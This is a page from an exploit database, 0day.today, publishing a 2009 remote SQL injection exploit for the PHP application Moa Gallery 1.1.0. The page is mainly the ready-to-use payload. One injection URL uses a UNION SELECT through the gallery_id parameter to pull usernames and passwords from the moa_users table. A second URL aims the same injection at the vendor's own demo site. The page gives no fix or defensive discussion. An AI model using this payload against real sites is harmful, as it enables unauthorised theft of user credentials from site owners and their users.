[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability

Author
Mr.tro0oqy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5679
Category
web applications
Date add
23-08-2009
Platform
unsorted
=================================================================
Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability
=================================================================



======================================================================
[»] Script : Moa gallery 1.1.0 (gallery_id) Remote Sql injection vuln

[»] Language : php  

[»] Download : http://sourceforge.net/projects/moagallery/

[»] Script site : http://www.moagallery.net/

[»] Founder: Mr.tro0oqy <- from Yemen
======================================================================
exploit:
--------

http://www.xxx.com/path/index.php?action=gallery_view&gallery_id=-0000000009+union+select+concat(name,char(58),password)+from+moa_users--

--------
demo:
--------

http://www.moagallery.net/demo/index.php?action=gallery_view&gallery_id=-0000000609+union+select+concat%28name,char%2858%29,password%29+from+moa_users--



#  0day.today [2024-12-26]  #